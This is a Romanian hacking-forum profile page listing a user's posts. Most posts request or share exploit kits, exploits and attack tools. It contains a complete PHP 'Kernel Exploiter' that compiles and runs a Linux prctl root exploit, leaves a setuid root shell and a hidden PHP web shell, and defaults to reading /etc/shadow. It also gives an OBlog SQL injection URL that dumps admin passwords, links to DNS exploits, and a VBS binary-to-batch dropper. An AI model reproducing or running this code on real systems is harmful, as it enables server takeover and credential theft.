Jump to content


Active Members
  • Content count

  • Joined

  • Last visited

Community Reputation

10 Good

About alexcargo

  • Rank
    Registered user
  1. NEOSPLOIT,MPACK sau Zunker

    NeoSploit este un tool care indentifica browseru si va lansa o serie de exploturi contra lui Zunker este un Complex Bot care are multe optiuni de atack si exploit screenshot aici http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/05/08/zunker2.png MPACK este o aplicatie php care se instaleaza pe un server web iar cand vizitatorul intra pe o pagina de obicei pe index.php va lansa o serie de exploituri contra lui
  2. NEOSPLOIT,MPACK sau Zunker

    are cineva vreunu din ele nu conteaza ce versiune? MPACK de la 0.60 la 0.80 daca e posibil MPACK costa 700 $ )
  3. Analizeaza Malware

  4. SMTP Server

    daca incerci sa trimiti de pe computerul tau mesajele mai intai vezi sa nu ai portul inchis de la provider de obicei daca ai un forum pe un host(pe host platit merge 100 %) nustiu pe cele free dar cred ca merge poate gresesc eu merge sa le trimiti membrilor mesaje indiferent unde au ei contul de email dar cred ca tu ai instalat pe serveru tau local si vrei sa trimiti dar ai nevoie de ca portul sa fie deschis ca sa poti sa trimiti am avut si eu aceiasi problema si am reusit sa trimit emailuri prin serveru de dns cu programul asta Zmei Sender http://www.zmei-soft.com/sender/zsender.exe ATENTIE NU TRIMITE SPAM DE PE HOSTUL TAU ITI RISTI PIELEA SPER CA NU ASTA E INTENTIA TA
  5. Ip dinamic

    nustiu daca e ceea ce iti trebuie tie dar incearca http://www.no-ip.com/
  6. Any2Bat

    dupa cum spune si titlu converteaza orice in .bat

    <?php /* Kernel Exploiter for use in RFI bugs. */ set_time_limit(0); if(isset($_POST['exploit_it'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { if($_POST['compiler'] == "none") { echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>'; end; } $cc = $_POST['compiler']; $prctl = '#!/bin/sh cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); if (getuid() == 0) { printf("\n[+] We have root!\n\n" ); system("/bin/sh"); system("$_POST[cmd]"); '; if(!stristr($_POST['shell'],"could not be found")) { $prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");'; } $prctl .= 'system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/core*"); system("exit"); } else { printf("\n[-] Failed.\n\n" ); system("rm -rf '.$_ENV["TMPDIR"].'/s"); } return 0; } __EOF__ '; $phpwrapper = '<?php if(isset($_GET[cmd])) { echo "<pre>"; echo passthru("'.$_POST['shell'].' -c \"$_GET[cmd]\""); echo "</pre>"; } ?>'; echo "<pre><div align='center'>"; $h = fopen("/tmp/a.sh", "w"); fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit.... "; echo passthru("sh /tmp/a.sh"); echo passthru("$cc -o /tmp/s /tmp/s.c"); echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c"); echo "Running exploit...waiting about 4 minutes to see if exploit worked "; echo passthru("/tmp/getsuid"); echo passthru("/tmp/s"); echo "Cleaning up "; echo passthru("rm -rf /tmp/getsuid*"); echo passthru("rm -rf /tmp/s.c"); echo passthru("rm -rf /tmp/a.sh"); echo "Done! </div> </pre>"; } else { echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname(); } } else { ?> <div align="center"> <h4>PHP Attack Script</h4> <h5><?php echo php_uname(); ?></h5> <pre><div align="center"> Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?> Checking for cc or gcc............<?php $path = explode(":",$_ENV["PATH"]); $gotcc = FALSE; $gotgcc = FALSE; foreach($path as $dir) { if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) { $gotcc = TRUE; $pathtocc = $dir."/cc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) { $gotgcc = TRUE; $pathtogcc = $dir."/gcc"; echo '[ <font color="#00CC00">OK</font> ]'."\n"; break; } } if($gotcc == FALSE && $gotgcc == FALSE) { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } ?> Checking for execute permissions..<?php $h = fopen("/tmp/test.sh","w"); fwrite($h,"#!/bin/sh"); fclose($h); system("sh /tmp/test.sh",$returnval); if($returnval == 0) { echo '[ <font color="#00CC00">OK</font> ]'."\n"; } else { echo '[ <font color="#FF0000">Failed</font> ]'."\n"; } passthru("rm -rf /tmp/test.sh"); ?> </pre></div> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Prctl 2.6.x exploit</option> </select> </td> </tr> <tr> <td><div align="right">Location and name for root shell:</div></td> <td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td> </tr> <tr> <td><div align="right">Location and name for php shell wrapper: </div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td> </tr> <tr> <td><div align="right">Commands to perform while root seperate multiple commands with ; : </div></td> <td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td> </tr> </table> </div> <div align="center"> <input type="hidden" name="compiler" value="<?php if(isset($pathtocc)) { echo $pathtocc; } elseif(isset($pathtogcc)) { echo $pathtogcc; } else { echo 'none'; } ?>" /> <input type="hidden" name="exploit_it" value="doit" /> <input name="submit" type="submit" value="Submit" /> After pressing submit it may take up to 4 minutes for the page to load depending on exploit. This is due to the exploit being run. If exploit fails the system may be patched or kernel may not be vuln. </div> </form> <?php } ?>
  8. milw0rm php shell public

    mersi ping dar eu am gasit chestia asta nu facuta de mine uni au facu phpshell asta si ia zis asa milw0rm nu e official dar in alte parti pe alte forumuri lumea imi sare in cap dar ei nu inteleg bine cuvantul sharing ma rog nu dau 2 bani pe ei.
  9. Scan your network for devices online

    Are you aware of all the devices – USB sticks, CDs, floppies, smartphones, MP3 players, handhelds, iPods, digital cameras – that have been connected to your network? As an administrator, do you know how many employees have been using or are using portable storage devices at the moment? Monitoring your network for these devices is not only time-consuming but nearly impossible to do manually. http://www.endpointscan.com/
  10. milw0rm php shell public

    http://www.mytempdir.com/1314256 misto imi place :wink: Enjoy
  11. Word Exe Exploiter

  12. OBlog 4.x (JS.ASP)

    Google dork inurl:/blog/js.asp http://www.site.com/blog/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1
  13. DNS Exploit Compilat 1si 2

    Exploitu 1 http://www.mytempdir.com/1314191 Exploitu 2 http://www.mytempdir.com/1314292 Enjoy :wink:
  14. Any2Bat

    on error resume next set arg=wscript.arguments if arg.count=0 then wscript.quit with CreateObject("ADODB.Stream") .type=1:.open:.loadfromfile arg(0):bs=.read:l=.size:.close end with if err.number<>0 then wscript.quit set fso=CreateObject("Scripting.FileSystemObject") with fso.opentextfile(arg(0)&".bat",2,true) if err.number<>0 then wscript.quit .writeline "@echo bs=_>xx.vbs" for k=1 to l step 129 .write "@echo """ .write b64b(midb(bs,k,129)) .writeline """+_>>xx.vbs" next .writeline "@echo """":set rs=CreateObject(""ADODB.Recordset"")>>xx.vbs" .writeline "@echo set ado=CreateObject(""ADODB.Stream"")>>xx.vbs" .writeline "@echo l=len(bs):ss="""":for k=1 to l step 4096:ss=ss+ub64(mid(bs,k,4096)):next:l=len(ss)>>xx.vbs" .writeline "@echo rs.fields.append ""b"",205,l/2:rs.open:rs.addnew:rs(""b"")=ss+chrb(0):rs.update>>xx.vbs" .writeline "@echo ado.mode=3:ado.type=1:ado.open:ado.write rs(""b"").getchunk(l/2)>>xx.vbs" .writeline "@echo ado.savetofile """+fso.getfilename(arg(0))+""",2:ado.close>>xx.vbs" .writeline "@echo function ub64(s):dim t(4),b(3):ub64="""":n=len(s):r=2 >>xx.vbs" .writeline "@echo if n mod 4^<^>0 then exit function:end if:for i=1 to n step 4:for j=0 to 3 >>xx.vbs" .writeline "@echo a=asc(mid(s,i+j,1)):if a=43 then:a=62:else if a=47 then:a=63:else if a^>47 and a^<58 then:_>>xx.vbs" .writeline "@echo a=a+4:else if a=61 then:a=0:if r=2 then r=j-2:end if:else if a^>64 and a^<91 then:_>>xx.vbs" .writeline "@echo a=a-65:else if a^>96 and a^<123 then:a=a-71:else:exit function:_>>xx.vbs" .writeline "@echo end if:end if:end if:end if:end if:end if:t(j)=a:next>>xx.vbs" .writeline "@echo b(0)=t(0)+t(1)*64 mod 256:b(1)=t(1)\4+t(2)*16 mod 256:b(2)=t(2)\16+t(3)*4 >>xx.vbs" .writeline "@echo for j=0 to r:if b(j)^<16 then ub64=ub64+""0"":end if:ub64=ub64+hex(b(j))>>xx.vbs" .writeline "@echo next:next:end function>>xx.vbs&&cscript.exe //nologo xx.vbs&del xx.vbs" end with const b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" function b64b(bin) b64b="" n=lenb(bin) for i=1 to n step 3 a=ascb(midb(bin,i,1)) b64b=b64b+mid(b64,a mod 64+1,1) if i b=ascb(midb(bin,i+1,1)) b64b=b64b+mid(b64,(a\64+b*4)mod 64+1,1) if i+1 c=ascb(midb(bin,i+2,1)) b64b=b64b+mid(b64,(b\16+c*16)mod 64+1,1) b64b=b64b+mid(b64,c\4+1,1) else b64b=b64b+mid(b64,b\16+1,1) b64b=b64b+"=" end if else b64b=b64b+mid(b64,a\64+1,1) b64b=b64b+"==" end if next end function copiatil intr-un fisier text si salvati ca Any2Bat.vbs sau cu ce nume doriti
  15. Help share

    din pacate nu am acces la C: vine cam asa share-ul meu \\xxx.xxx.xxx.xxx\SharedDocs\aplicatie.exe da cum sa il execut la el ????